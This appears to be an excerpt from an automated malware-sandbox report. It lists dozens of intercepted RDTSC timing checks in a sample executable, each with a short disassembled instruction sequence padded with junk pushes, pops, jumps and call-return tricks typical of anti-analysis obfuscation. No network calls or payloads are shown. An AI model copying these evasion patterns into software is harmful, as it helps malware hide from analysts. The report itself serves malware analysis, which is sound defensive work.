Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F54579 second address: F545E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F577C53EFCCh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F577C53EFC8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F577C53EFC8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 mov dword ptr [ebp+12BAA654h], edx 0x0000004f movsx esi, cx 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 push eax 0x00000057 pop eax 0x00000058 pop ebx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F54323 second address: F5432E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F577C5415C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5432E second address: F54333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F59D02 second address: F59D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F59D06 second address: F59D10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F59D10 second address: F59D15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F59D15 second address: F59D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5BE38 second address: F5BE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F577C5415C8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov bx, 2363h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F577C5415C8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 push 00000000h 0x00000043 push ebx 0x00000044 add dword ptr [ebp+12A0199Ch], edx 0x0000004a pop edi 0x0000004b xchg eax, esi 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5BE9A second address: F5BE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5AFD2 second address: F5B071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov di, 4C0Fh 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F577C5415C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov bx, 5EE1h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 call 00007F577C5415CAh 0x0000003e mov dword ptr [ebp+12A0182Ch], ebx 0x00000044 pop ebx 0x00000045 mov eax, dword ptr [ebp+12A00C75h] 0x0000004b sub ebx, dword ptr [ebp+12A0197Ah] 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 call 00007F577C5415C8h 0x0000005b pop ebx 0x0000005c mov dword ptr [esp+04h], ebx 0x00000060 add dword ptr [esp+04h], 0000001Bh 0x00000068 inc ebx 0x00000069 push ebx 0x0000006a ret 0x0000006b pop ebx 0x0000006c ret 0x0000006d mov bl, ABh 0x0000006f push eax 0x00000070 je 00007F577C5415DFh 0x00000076 pushad 0x00000077 jmp 00007F577C5415D1h 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5BE9E second address: F5BEA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5BEA4 second address: F5BEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5BEAA second address: F5BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5DCA7 second address: F5DCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5DCAB second address: F5DCB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5DCB5 second address: F5DCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5ECE8 second address: F5ED04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5DDCE second address: F5DDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5ED04 second address: F5EDCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F577C53EFD2h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F577C53EFC8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+12BAA35Fh], edi 0x00000031 push 00000000h 0x00000033 movsx edi, bx 0x00000036 mov di, E8A6h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F577C53EFC8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 jmp 00007F577C53EFD8h 0x0000005b xchg eax, esi 0x0000005c jmp 00007F577C53EFD6h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 ja 00007F577C53EFDCh 0x0000006a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5DDD3 second address: F5DDF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5DDF3 second address: F5DDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5DEC5 second address: F5DED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F577C5415C6h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5FB27 second address: F5FB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F577C53EFCDh 0x0000000c nop 0x0000000d or di, 8B85h 0x00000012 push 00000000h 0x00000014 mov edi, esi 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+12B89F78h], ebx 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F577C53EFCEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5FB5E second address: F5FB75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F60B20 second address: F60BCE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F577C53EFD2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F577C53EFD4h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F577C53EFC8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov bx, C5BAh 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+12A02C4Ch], ecx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007F577C53EFC8h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 mov dword ptr [ebp+12B89F78h], esi 0x0000005a ja 00007F577C53EFCCh 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007F577C53EFD7h 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5FCE5 second address: F5FCEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F61C44 second address: F61C49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F61C49 second address: F61C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F577C5415C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 je 00007F577C5415C6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F61C61 second address: F61C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F61C67 second address: F61C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F61C6B second address: F61CE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d movsx esi, si 0x00000010 popad 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F577C53EFC8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F577C53EFC8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+12A03687h], ebx 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F61CE4 second address: F61CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F61CE8 second address: F61CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F62C95 second address: F62CAF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F577C5415CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c jng 00007F577C5415CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F62CAF second address: F62CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov ebx, ecx 0x00000008 mov ebx, dword ptr [ebp+12A02B43h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 movsx edi, bx 0x00000015 stc 0x00000016 xchg eax, esi 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F577C53EFC6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F66CC5 second address: F66CCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F66CCB second address: F66CD5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F577C53EFCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F68BCA second address: F68BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F61ED1 second address: F61EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F577C53EFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F67E0A second address: F67E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F67E10 second address: F67EAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+12B8119Bh] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F577C53EFC8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push ecx 0x00000033 mov edi, dword ptr [ebp+12A02B0Bh] 0x00000039 pop edi 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 jmp 00007F577C53EFD1h 0x00000046 mov eax, dword ptr [ebp+12A00555h] 0x0000004c mov edi, dword ptr [ebp+12A0290Fh] 0x00000052 mov ebx, dword ptr [ebp+12A02B1Fh] 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push edi 0x0000005d call 00007F577C53EFC8h 0x00000062 pop edi 0x00000063 mov dword ptr [esp+04h], edi 0x00000067 add dword ptr [esp+04h], 00000017h 0x0000006f inc edi 0x00000070 push edi 0x00000071 ret 0x00000072 pop edi 0x00000073 ret 0x00000074 push edx 0x00000075 mov edi, 7C0B2646h 0x0000007a pop ebx 0x0000007b mov bx, 2514h 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 jno 00007F577C53EFC8h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F67EAF second address: F67ED7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F577C5415CAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F709B5 second address: F709B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F727FD second address: F72801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F765F2 second address: F76611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jnp 00007F577C53EFD4h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F76611 second address: F76649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F577C5415C6h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f jl 00007F577C5415C6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d popad 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F577C5415D3h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F767B3 second address: F767C0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F767C0 second address: F767E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F577C5415CAh 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jmp 00007F577C5415CCh 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F78144 second address: F78149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7E9FD second address: F7EA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7ECF1 second address: F7ECFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F577C53EFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7EE46 second address: F7EE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7EE4E second address: F7EE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFD4h 0x00000009 popad 0x0000000a jnc 00007F577C53EFC8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7EFD8 second address: F7EFDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7EFDD second address: F7EFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F577C53EFC6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F577C53EFC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7EFF0 second address: F7EFF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7EFF4 second address: F7F000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7F000 second address: F7F006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7F006 second address: F7F015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7F015 second address: F7F019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7F019 second address: F7F039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFD6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7F039 second address: F7F03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7F2D4 second address: F7F2E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F7F635 second address: F7F662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F577C5415C6h 0x0000000a popad 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 jmp 00007F577C5415D5h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84634 second address: F84659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F577C53EFC6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84659 second address: F84687 instructions: 0x00000000 rdtsc 0x00000002 js 00007F577C5415C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F577C5415D0h 0x00000011 jmp 00007F577C5415D2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84AC1 second address: F84AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84AC5 second address: F84ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84ACB second address: F84AF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F577C53EFCCh 0x00000008 jnp 00007F577C53EFC6h 0x0000000e jnp 00007F577C53EFC8h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007F577C53EFCCh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
